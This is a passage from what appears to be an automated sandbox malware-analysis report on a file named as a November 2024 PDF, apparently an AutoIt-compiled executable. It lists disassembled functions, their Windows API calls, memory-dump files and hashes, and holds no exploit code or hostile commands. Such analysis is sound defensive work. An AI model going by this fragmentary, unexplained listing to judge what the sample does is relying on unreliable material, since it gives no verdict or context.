                                                                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 0075179A
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 007517FE
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0075181B
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0075182C
                                                                                                                      • EndPaint.USER32(?,?), ref: 00751876
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1827037458-0
                                                                                                                      • Opcode ID: 8231f531cce8a1fef7ed8f38090de58ae68a32bdd799ca2392fcd2258a15ebd9
                                                                                                                      • Instruction ID: d45a192b2fff4b24e434c4763c1621ee4a72ba1bd3da33d6ffe3b8e8196de3f1
                                                                                                                      • Opcode Fuzzy Hash: 8231f531cce8a1fef7ed8f38090de58ae68a32bdd799ca2392fcd2258a15ebd9
                                                                                                                      • Instruction Fuzzy Hash: 85419F70100201AFD710DF25CC84BB67BF8FB49736F048669F9A5862A1D779A849DB62
                                                                                                                      Function 007DB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(008167B0,00000000,019059A0,?,?,008167B0,?,007DB862,?,?), ref: 007DB9CC
                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 007DB9F0
                                                                                                                      • ShowWindow.USER32(008167B0,00000000,019059A0,?,?,008167B0,?,007DB862,?,?), ref: 007DBA50
                                                                                                                      • ShowWindow.USER32(00000000,00000004,?,007DB862,?,?), ref: 007DBA62
                                                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 007DBA86
                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007DBAA9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 642888154-0
                                                                                                                      • Opcode ID: 00aeab717322b7b70e58ab44f152c4a60398f34bdba8731a301037ff5ba4d0d4
                                                                                                                      • Instruction ID: 7cb32572f1e0bb9d048d8a7308f729274b2336ba64799535b441b8bf92452976
                                                                                                                      • Opcode Fuzzy Hash: 00aeab717322b7b70e58ab44f152c4a60398f34bdba8731a301037ff5ba4d0d4
                                                                                                                      • Instruction Fuzzy Hash: 16414F34601241EFDB21CF24C499B957BF0FB49310F1A82BBEA499F7A2C739A845CB51
                                                                                                                      Function 007C73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,007C5134,?,?,00000000,00000001), ref: 007C73BF
                                                                                                                        • Part of subcall function 007C3C94: GetWindowRect.USER32(?,?), ref: 007C3CA7
                                                                                                                      • GetDesktopWindow.USER32 ref: 007C73E9
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 007C73F0
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007C7422
                                                                                                                        • Part of subcall function 007B54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
                                                                                                                      • GetCursorPos.USER32(?), ref: 007C744E
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007C74AC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4137160315-0
                                                                                                                      • Opcode ID: 4399ec63805a0b902c0ab2639b1c04b286a6b18314aa2cae3aaa2181d3f7fa76
                                                                                                                      • Instruction ID: 7ed29c7025c61f9c2cee4f5f72d822511dcbc336863d82fbd2d22b4656297fc5
                                                                                                                      • Opcode Fuzzy Hash: 4399ec63805a0b902c0ab2639b1c04b286a6b18314aa2cae3aaa2181d3f7fa76
                                                                                                                      • Instruction Fuzzy Hash: 22310432509345ABC728DF14D849F9BBBE9FF88314F00491EF48997191CB38EA08CB92
                                                                                                                      Function 007A8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007A85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007A8608
                                                                                                                        • Part of subcall function 007A85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007A8612
                                                                                                                        • Part of subcall function 007A85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007A8621
                                                                                                                        • Part of subcall function 007A85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007A8628
                                                                                                                        • Part of subcall function 007A85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007A863E
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,007A8977), ref: 007A8DAC
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007A8DB8
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 007A8DBF
                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 007A8DD8
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,007A8977), ref: 007A8DEC
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 007A8DF3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3008561057-0
                                                                                                                      • Opcode ID: 19105afd2250670dfdc13655f3fcee47a609426306ab0a0cf5ed4c7e968147cc
                                                                                                                      • Instruction ID: a5eec58c9952b7f214b30e01d813bd7496c16aae889d268c83d3e03c5e8bab78
                                                                                                                      • Opcode Fuzzy Hash: 19105afd2250670dfdc13655f3fcee47a609426306ab0a0cf5ed4c7e968147cc
                                                                                                                      • Instruction Fuzzy Hash: 78110332601605FFDB549F64CC08BAE7B79FF8A315F10822AF88697250CB3A9D00CB61
                                                                                                                      Function 007A8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007A8B2A
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 007A8B31
                                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007A8B40
                                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 007A8B4B
                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007A8B7A
                                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 007A8B8E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1413079979-0
                                                                                                                      • Opcode ID: e235678695c3f86b0fa186ed8fc8aa9fea3b55e2d9478a52d54d13419f7e9e3b
                                                                                                                      • Instruction ID: 9966d33e0ae0d01789eee5e0c13f3c993a338beddecc534543b556ce826a5fcb
                                                                                                                      • Opcode Fuzzy Hash: e235678695c3f86b0fa186ed8fc8aa9fea3b55e2d9478a52d54d13419f7e9e3b
                                                                                                                      • Instruction Fuzzy Hash: D41129B2501209ABDF018FA8ED49FDE7BB9FF49314F048165FE05A2160C77A9D60AB61
                                                                                                                      Function 007DC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007512F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
                                                                                                                        • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075135C
                                                                                                                        • Part of subcall function 007512F3: BeginPath.GDI32(?), ref: 00751373
                                                                                                                        • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075139C
                                                                                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007DC1C4
                                                                                                                      • LineTo.GDI32(00000000,00000003,?), ref: 007DC1D8
                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007DC1E6
                                                                                                                      • LineTo.GDI32(00000000,00000000,?), ref: 007DC1F6
                                                                                                                      • EndPath.GDI32(00000000), ref: 007DC206
                                                                                                                      • StrokePath.GDI32(00000000), ref: 007DC216
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 43455801-0
                                                                                                                      • Opcode ID: c9b6239b6eefc246cab1a9a293fe6b84abcd7c86e41d26f95ca7863b41952d1f
                                                                                                                      • Instruction ID: a604100b110a54bec08643f68b9beae481037c1d470e81ee1ab04db64708d53d
                                                                                                                      • Opcode Fuzzy Hash: c9b6239b6eefc246cab1a9a293fe6b84abcd7c86e41d26f95ca7863b41952d1f
                                                                                                                      • Instruction Fuzzy Hash: A811F77640010DBFDB129F90DC88EEA7FADFF08354F048022FA195A161D7769E55DBA0
                                                                                                                      Function 007703A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007703D3
                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 007703DB
                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007703E6
                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007703F1
                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 007703F9
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00770401
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4278518827-0
                                                                                                                      • Opcode ID: b1c7803407d19264834d46be53cda52b9cdb9ee9263ff325e70b419147878ac6
                                                                                                                      • Instruction ID: 639564cf0432b3fd9fe4738413ae39a99cb4a4aa752333ca53fb88f985ce0813
                                                                                                                      • Opcode Fuzzy Hash: b1c7803407d19264834d46be53cda52b9cdb9ee9263ff325e70b419147878ac6
                                                                                                                      • Instruction Fuzzy Hash: 8B0148B0902759BDE3008F5A8C85A52FFA8FF19354F00411BE15847941C7B5A864CBE5
                                                                                                                      Function 007B568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007B569B
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007B56B1
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 007B56C0
                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B56CF
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B56D9
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B56E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 839392675-0
                                                                                                                      • Opcode ID: a978426bfc4dfe94826e72955f2ea0cc1a506a3fce9b932ce0bc7fedb7a9620e
                                                                                                                      • Instruction ID: ea053f3a7939fe805057978136113968c99ab897f24ddb7388bc1c8da4aba3e0
                                                                                                                      • Opcode Fuzzy Hash: a978426bfc4dfe94826e72955f2ea0cc1a506a3fce9b932ce0bc7fedb7a9620e
                                                                                                                      • Instruction Fuzzy Hash: 1CF03032242158BBE7215BA2DC0DEEF7F7CEFC6B11F04416AFA06D1050D7A95A0186B9
                                                                                                                      Function 007B74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 007B74E5
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00761044,?,?), ref: 007B74F6
                                                                                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00761044,?,?), ref: 007B7503
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00761044,?,?), ref: 007B7510
                                                                                                                        • Part of subcall function 007B6ED7: CloseHandle.KERNEL32(00000000,?,007B751D,?,00761044,?,?), ref: 007B6EE1
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 007B7523
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00761044,?,?), ref: 007B752A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3495660284-0
                                                                                                                      • Opcode ID: cc1ec99bb17e55491b2e2f7c6774f7a4c71c56d8f7bacd192809e92ae8ba0ad2
                                                                                                                      • Instruction ID: 0ede34388908686080131d3596c08141ac48ff0a084fae39e02ec4b085f35ca2
                                                                                                                      • Opcode Fuzzy Hash: cc1ec99bb17e55491b2e2f7c6774f7a4c71c56d8f7bacd192809e92ae8ba0ad2
                                                                                                                      • Instruction Fuzzy Hash: 44F03A3A142612EBDB112B64EC8CAEE773ABF45302B014532F243A10A0CB796911CB64
                                                                                                                      Function 007A8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007A8E7F
                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 007A8E8B
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 007A8E94
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 007A8E9C
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 007A8EA5
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 007A8EAC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 146765662-0
                                                                                                                      • Opcode ID: 6bb56fb48f429c37275c1f53a158a297bc8705efa3d1c79acde48ec5a7507598
                                                                                                                      • Instruction ID: c9e9d49794aab6145ce7aa3a184005001cf46356b467754013e4e72bc4e0eef9
                                                                                                                      • Opcode Fuzzy Hash: 6bb56fb48f429c37275c1f53a158a297bc8705efa3d1c79acde48ec5a7507598
                                                                                                                      • Instruction Fuzzy Hash: 9EE0C236105005FBDA012FE5EC0C94ABF79FB89322B50C232F21A81170CB3A9820DB58
                                                                                                                      Function 007A7A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7C32
                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7C4A
                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,007DFB80,000000FF,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7C6F
                                                                                                                      • _memcmp.LIBCMT ref: 007A7C90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                                                      • String ID: ,,~
                                                                                                                      • API String ID: 314563124-1083855107
                                                                                                                      • Opcode ID: 25d6196784aca546f019fc53695bc8e6c3541248cdb2e108abab0272147c3045
                                                                                                                      • Instruction ID: a315bf806007a10576dfba5dda8fbba4482d199b8c58deff541c93a5ffe3bbd6
                                                                                                                      • Opcode Fuzzy Hash: 25d6196784aca546f019fc53695bc8e6c3541248cdb2e108abab0272147c3045
                                                                                                                      • Instruction Fuzzy Hash: E8810CB1A00109EFCB04DF94C984EEEB7B9FF89315F204599F516AB250DB75AE06CB60
                                                                                                                      Function 007C8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 007C8928
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 007C8A37
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 007C8BAF
                                                                                                                        • Part of subcall function 007B7804: VariantInit.OLEAUT32(00000000), ref: 007B7844
                                                                                                                        • Part of subcall function 007B7804: VariantCopy.OLEAUT32(00000000,?), ref: 007B784D
                                                                                                                        • Part of subcall function 007B7804: VariantClear.OLEAUT32(00000000), ref: 007B7859
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                      • Opcode ID: ab118a212944bbc64c291e4f30065dc655ea4f78feaa95b85877261d1e8b4667
                                                                                                                      • Instruction ID: a1e17487c92abffa88426132d780584de431be90ee7b65aa07073772561d2b94
                                                                                                                      • Opcode Fuzzy Hash: ab118a212944bbc64c291e4f30065dc655ea4f78feaa95b85877261d1e8b4667
                                                                                                                      • Instruction Fuzzy Hash: E6916CB5608301DFC754DF24C484E5ABBE4EF89314F04896EF99A8B361DB38E909CB52
                                                                                                                      Function 007B2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
                                                                                                                      • _memset.LIBCMT ref: 007B3077
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007B30A6
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007B3159
                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007B3187
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
